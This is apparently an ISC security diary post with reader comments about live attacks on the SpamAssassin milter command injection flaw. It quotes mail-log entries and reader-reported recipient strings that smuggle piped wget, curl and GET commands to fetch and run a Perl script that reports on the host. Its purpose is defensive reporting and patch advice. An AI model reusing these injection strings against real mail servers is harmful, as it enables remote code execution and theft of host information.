Spamassassin Milter Plugin Remote Root Attack

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://;perl p.txt:[] : User unknown in local recipient
       table; from=<> to=<root+:|wget
       hxxp:// : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at

The perl script collects some information about the local host and tries to send it to on port 80 -- this host appears to be unreachable at the moment though.

Adrien de Beaupré


Adrien de Beaupre

353 Posts
ISC Handler
Mar 15th 2010
On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?

9 Posts
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
3 Posts
I havve logged attempts to use curl as well.

rcpt to: root+:"|wget"

rcpt to: root+:"|wget"
rcpt to: root+:"|GET"
rcpt to: root+:"|curl"

5 Posts
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).

7 Posts

Sign Up for Free or Log In to start participating in the conversation!